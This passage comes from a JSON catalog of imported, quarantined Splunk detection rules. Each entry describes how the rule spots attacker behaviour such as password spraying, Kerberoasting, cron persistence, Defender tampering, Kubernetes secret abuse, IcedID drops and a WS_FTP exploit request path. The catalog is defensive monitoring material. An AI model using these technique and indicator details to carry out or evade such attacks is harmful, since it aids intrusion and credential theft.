malicious requests. This activity is significant for a SOC because successful exploitation can allow attackers to impersonate legitimate users, bypass authentication, and access sensitive data. 
If confirmed malicious, it could lead to unauthorized data access, network propagation, and critical information exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-adc-and-gateway-unauthorized-data-disclosure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b593cac5-dd20-4358-972a-d945fefdaf17", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_adc_and_gateway_unauthorized_data_disclosure.yml" } }, { "id": "splunk-security-content-b5b91200-5f27-11ec-bb4e-acde48001122", "type": "detection", "name": "Linux Possible Append Cronjob Entry on Existing Cronjob File", "description": "The following analytic detects potential tampering with cronjob files on a Linux system by identifying 'echo' commands that append code to existing cronjob files. It leverages logs from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because adversaries often use it for persistence or privilege escalation. 
If confirmed malicious, this could allow attackers to execute unauthorized code automatically, leading to system compromises and unauthorized data access, thereby impacting business operations and data integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-append-cronjob-entry-on-existing-cronjob-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5b91200-5f27-11ec-bb4e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_append_cronjob_entry_on_existing_cronjob_file.yml" } }, { "id": "splunk-security-content-b5baa09a-7a05-11ec-8da4-acde48001122", "type": "detection", "name": "Excessive File Deletion In WinDefender Folder", "description": "The following analytic detects excessive file deletion events in the Windows Defender folder. It leverages Sysmon EventCodes 23 and 26 to identify processes deleting multiple files within this directory. This behavior is significant as it may indicate an attempt to corrupt or disable Windows Defender, a key security component. 
If confirmed malicious, this activity could allow an attacker to disable endpoint protection, facilitating further malicious actions without detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-file-deletion-in-windefender-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5baa09a-7a05-11ec-8da4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_file_deletion_in_windefender_folder.yml" } }, { "id": "splunk-security-content-b5cd5526-cce7-11eb-b3bd-acde48001122", "type": "detection", "name": "WMI Recon Running Process Or Services", "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104, where WMI performs an event query to list running processes or services. This detection leverages PowerShell Script Block Logging to capture and analyze script block text for specific WMI queries. This activity is significant as it is commonly used by malware and APT actors to map security applications or services on a compromised machine. 
If confirmed malicious, this could allow attackers to identify and potentially disable security defenses, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-recon-running-process-or-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5cd5526-cce7-11eb-b3bd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_recon_running_process_or_services.yml" } }, { "id": "splunk-security-content-b5e3b024-a7bb-4019-8975-46cf54485e78", "type": "detection", "name": "ESXi Account Modified", "description": "This detection identifies the creation, deletion, or modification of a local user account on an ESXi host. 
This activity may indicate unauthorized access, indicator removal, or persistence attempts by an attacker seeking to establish or maintain control of the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1078", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-account-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5e3b024-a7bb-4019-8975-46cf54485e78", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_account_modified.yml" } }, { "id": "splunk-security-content-b5eed06d-5c97-4092-a3a1-fa4b7e77c71a", "type": "detection", "name": "Linux Auditd Service Started", "description": "The following analytic detects a suspicious service being started. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. 
Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-service-started.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5eed06d-5c97-4092-a3a1-fa4b7e77c71a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_service_started.yml" } }, { "id": "splunk-security-content-b62a6040-49f4-47c8-b3f6-fc1adb952a33", "type": "detection", "name": "Windows Application Layer Protocol RMS Radmin Tool Namedpipe", "description": "The following analytic detects the use of default or publicly known named pipes associated with the RMX remote admin tool. It leverages Sysmon EventCodes 17 and 18 to identify named pipe creation and connection events. This activity is significant as the RMX tool has been abused by adversaries and malware like Azorult to collect data from targeted hosts. If confirmed malicious, this could indicate unauthorized remote administration capabilities, leading to data exfiltration or further compromise of the affected system. 
Immediate investigation is required to determine the legitimacy of this tool's presence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-application-layer-protocol-rms-radmin-tool-namedpipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b62a6040-49f4-47c8-b3f6-fc1adb952a33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_application_layer_protocol_rms_radmin_tool_namedpipe.yml" } }, { "id": "splunk-security-content-b6391b15-e913-4c2c-8949-9eecc06efacc", "type": "detection", "name": "Detect Password Spray Attack Behavior From Source", "description": "The following analytic identifies one source failing to authenticate with 10 or more unique users. This behavior could represent an adversary performing a Password Spraying attack to obtain initial access or elevate privileges. This logic can be used for real time security monitoring as well as threat hunting exercises and works well against any number of data sources ingested into the CIM datamodel. Environments can be very different depending on the organization. 
Test and customize this detection's thresholds if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-password-spray-attack-behavior-from-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b6391b15-e913-4c2c-8949-9eecc06efacc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_password_spray_attack_behavior_from_source.yml" } }, { "id": "splunk-security-content-b66aeaa4-586f-428b-8a2b-c4fd3039d8d3", "type": "detection", "name": "O365 Email Receive and Hard Delete Takeover Behavior", "description": "The following analytic identifies when an O365 email recipient receives and then deletes emails related to password or banking/payroll changes within a short period. 
This behavior may indicate a compromised account where the threat actor is attempting to redirect the victim's payroll to an attacker-controlled bank account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485", "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-receive-and-hard-delete-takeover-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b66aeaa4-586f-428b-8a2b-c4fd3039d8d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_receive_and_hard_delete_takeover_behavior.yml" } }, { "id": "splunk-security-content-b681977c-d90c-4efc-81a5-c58f945fb541", "type": "detection", "name": "Windows AD Short Lived Domain Account ServicePrincipalName", "description": "The following analytic identifies the addition and quick deletion of a Service Principal Name (SPN) to a domain account within 5 minutes. This detection leverages EventCode 5136 from the Windows Security Event Log, focusing on changes to the servicePrincipalName attribute. This activity is significant as it may indicate an attempt to perform Kerberoasting, a technique used to crack the cleartext password of a domain account offline. 
If confirmed malicious, this could allow an attacker to gain unauthorized access to sensitive information or escalate privileges within the domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-short-lived-domain-account-serviceprincipalname.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b681977c-d90c-4efc-81a5-c58f945fb541", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_short_lived_domain_account_serviceprincipalname.yml" } }, { "id": "splunk-security-content-b686d0bd-cca7-44ca-ae07-87f6465131d9", "type": "detection", "name": "O365 Service Principal Privilege Escalation", "description": "This detection identifies when an Azure Service Principal elevates privileges by adding themself to a new app role assignment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-service-principal-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b686d0bd-cca7-44ca-ae07-87f6465131d9", "source_commit": "4d4c7ee", "license": 
"Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_service_principal_privilege_escalation.yml" } }, { "id": "splunk-security-content-b690df8c-a145-11eb-a38b-acde48001122", "type": "detection", "name": "SearchProtocolHost with no Command Line with Network", "description": "The following analytic detects instances of searchprotocolhost.exe running without command line arguments but with an active network connection. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process execution and network traffic data. It is significant because searchprotocolhost.exe typically runs with specific command line arguments, and deviations from this norm can indicate malicious activity, such as Cobalt Strike usage. If confirmed malicious, this activity could allow attackers to establish network connections for command and control, potentially leading to data exfiltration or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/searchprotocolhost-with-no-command-line-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b690df8c-a145-11eb-a38b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml" } }, { "id": 
"splunk-security-content-b6e0ff70-b122-4227-9368-4cf322ab43c3", "type": "detection", "name": "USN Journal Deletion", "description": "The following analytic detects the deletion of the USN Journal using the fsutil.exe utility. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because the USN Journal maintains a log of all changes made to files on the disk, and its deletion can be an indicator of an attempt to cover tracks or hinder forensic investigations. If confirmed malicious, this action could allow an attacker to obscure their activities, making it difficult to trace file modifications and potentially compromising incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/usn-journal-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b6e0ff70-b122-4227-9368-4cf322ab43c3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/usn_journal_deletion.yml" } }, { "id": "splunk-security-content-b6f45bbc-4ea9-4068-b3bc-0477f6997ae2", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual User Group", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user groups. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests and user groups. 
This activity is significant for a SOC as Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys. If confirmed malicious, this behavior could indicate an attacker attempting to exfiltrate or misuse these secrets, potentially leading to unauthorized access to sensitive systems or data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-user-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b6f45bbc-4ea9-4068-b3bc-0477f6997ae2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_user_group.yml" } }, { "id": "splunk-security-content-b71adfcc-155b-11ec-9413-acde48001122", "type": "detection", "name": "PowerShell Get LocalGroup Discovery", "description": "The following analytic identifies the use of the `get-localgroup` command executed via PowerShell or cmd.exe to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is significant as it may indicate an attacker attempting to gather information about local group memberships, which can be a precursor to privilege escalation. 
If confirmed malicious, this activity could allow an attacker to identify and target privileged accounts, potentially leading to unauthorized access and control over the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-get-localgroup-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b71adfcc-155b-11ec-9413-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_get_localgroup_discovery.yml" } }, { "id": "splunk-security-content-b71e57e8-c571-4ff1-ae13-bc4384a9e891", "type": "detection", "name": "Cisco Secure Firewall - Intrusion Events by Threat Activity", "description": "This analytic detects intrusion events from known threat activity using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where one or multiple Snort signatures\nassociated with a known threat or threat actor activity have been triggered within a one-hour time window. 
The detection uses a\nlookup table (cisco_snort_ids_to_threat_mapping) to map Snort signature IDs to known threat actors and their techniques.\nWhen multiple signatures associated with the same threat actor are triggered within the time window, and the count of\nunique signatures matches or exceeds the expected number of signatures for that threat technique, an alert is generated.\nThis helps identify potential coordinated threat activity in your network environment by correlating related intrusion\nevents that occur in close temporal proximity.\n\nCurrently, this detection will alert on the following threat actors or malware families as defined in the cisco_snort_ids_to_threat_mapping lookup:\n\n* AgentTesla\n* Amadey\n* ArcaneDoor\n* AsyncRAT\n* CastleRAT\n* Chafer\n* DCRAT\n* LokiBot\n* Lumma Stealer\n* Nobelium\n* Quasar\n* Remcos\n* Snake\n* Static Tundra\n* Xworm\n\nTo add or update threat actors, update the cisco_snort_ids_to_threat_mapping.csv lookup file with new or modified threat names and associated Snort signature IDs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-intrusion-events-by-threat-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b71e57e8-c571-4ff1-ae13-bc4384a9e891", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___intrusion_events_by_threat_activity.yml" } }, { "id": 
"splunk-security-content-b7548c2e-9a10-11ec-99e3-acde48001122", "type": "detection", "name": "Windows Modify Show Compress Color And Info Tip Registry", "description": "The following analytic detects suspicious modifications to the Windows registry keys related to file compression color and information tips. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"ShowCompColor\" and \"ShowInfoTip\" values under the \"Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\" path. This activity is significant as it was observed in the Hermetic Wiper malware, indicating potential malicious intent to alter file attributes and user interface elements. If confirmed malicious, this could signify an attempt to manipulate file visibility and deceive users, potentially aiding in further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-show-compress-color-and-info-tip-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7548c2e-9a10-11ec-99e3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml" } }, { "id": "splunk-security-content-b7a045fc-f14a-11eb-8e79-acde48001122", "type": "detection", "name": "Drop IcedID License dat", "description": "The following analytic detects the dropping of a suspicious file named \"license.dat\" in %appdata% or 
%programdata%. This behavior is associated with the IcedID malware, which uses this file to inject its core bot into other processes for banking credential theft. The detection leverages Sysmon EventCode 11 to monitor file creation events in these directories. This activity is significant as it indicates a potential malware infection aiming to steal sensitive banking information. If confirmed malicious, the attacker could gain unauthorized access to financial data, leading to significant financial loss and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/drop-icedid-license-dat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7a045fc-f14a-11eb-8e79-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/drop_icedid_license_dat.yml" } }, { "id": "splunk-security-content-b7bd83c0-92b5-4fc7-b286-23eccfa2c561", "type": "detection", "name": "Windows COM Hijacking InprocServer32 Modification", "description": "The following analytic detects the modification of the InProcServer32 registry key by reg.exe, indicative of potential COM hijacking. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line execution logs. COM hijacking is significant as it allows adversaries to insert malicious code that executes in place of legitimate software, providing a means for persistence. 
If confirmed malicious, this activity could enable attackers to execute arbitrary code, disrupt legitimate system components, and maintain long-term access to the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-com-hijacking-inprocserver32-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7bd83c0-92b5-4fc7-b286-23eccfa2c561", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml" } }, { "id": "splunk-security-content-b7e11721-08b1-4d8b-9628-813bb2380514", "type": "detection", "name": "Wmiprvse LOLBAS Execution Process Spawn", "description": "The following analytic detects `wmiprvse.exe` spawning a LOLBAS execution process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where `wmiprvse.exe` is the parent process and the child process is a known LOLBAS binary. This activity is significant as it may indicate lateral movement or remote code execution by an adversary abusing Windows Management Instrumentation (WMI). 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmiprvse-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7e11721-08b1-4d8b-9628-813bb2380514", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmiprvse_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-b8003567-c5b6-445b-8966-ecdacc81c24d", "type": "detection", "name": "ESXi SSH Enabled", "description": "This detection identifies SSH being enabled on ESXi hosts, which can be an early indicator of malicious activity. 
Threat actors often use SSH to gain persistent remote access after compromising credentials or exploiting vulnerabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-ssh-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8003567-c5b6-445b-8966-ecdacc81c24d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_ssh_enabled.yml" } }, { "id": "splunk-security-content-b8340d0f-ba48-4391-bea7-9e793c5aae36", "type": "detection", "name": "Windows Process Injection into Notepad", "description": "The following analytic detects process injection into Notepad.exe using Sysmon EventCode 10. It identifies suspicious GrantedAccess requests (0x40 and 0x1fffff) to Notepad.exe, excluding common system paths like System32, Syswow64, and Program Files. This behavior is often associated with the SliverC2 framework by BishopFox. Monitoring this activity is crucial as it may indicate an initial payload attempting to execute malicious code within Notepad.exe. 
If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-into-notepad.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8340d0f-ba48-4391-bea7-9e793c5aae36", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_into_notepad.yml" } }, { "id": "splunk-security-content-b84e8f39-4e7b-4d4f-9e7c-fcd29a227845", "type": "detection", "name": "WS FTP Remote Code Execution", "description": "The following analytic detects potential Remote Code Execution (RCE) attempts exploiting CVE-2023-40044 in WS_FTP software.\nIt identifies HTTP POST requests to the \"/AHT/AhtApiService.asmx/AuthUser\" URL with a status code of 200.\nThis detection leverages the Web datamodel to monitor specific URL patterns and HTTP status codes. 
This activity is significant as it may indicate an exploitation attempt, potentially allowing an attacker to execute arbitrary code on the server.\nIf confirmed malicious, this could lead to unauthorized access, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ws-ftp-remote-code-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b84e8f39-4e7b-4d4f-9e7c-fcd29a227845", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ws_ftp_remote_code_execution.yml" } }, { "id": "splunk-security-content-b85bbeec-6326-11ec-9311-acde48001122", "type": "detection", "name": "Linux File Created In Kernel Driver Directory", "description": "The following analytic detects the creation of files in the Linux kernel/driver directory. It leverages filesystem data to identify new files in this critical directory. This activity is significant because the kernel/driver directory is typically reserved for kernel modules, and unauthorized file creation here can indicate a rootkit installation. 
If confirmed malicious, this could allow an attacker to gain high-level privileges, potentially compromising the entire system by executing code at the kernel level.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-file-created-in-kernel-driver-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b85bbeec-6326-11ec-9311-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_file_created_in_kernel_driver_directory.yml" } }, { "id": "splunk-security-content-b87b48a8-6d1a-4280-9cf1-16a950dbf901", "type": "detection", "name": "Cisco ASA - Logging Filters Configuration Tampering", "description": "This analytic detects tampering with logging filter configurations on Cisco ASA devices via CLI or ASDM.\nAdversaries may reduce logging levels or disable specific log categories to evade detection, hide their activities, or prevent security monitoring systems from capturing evidence of their actions. 
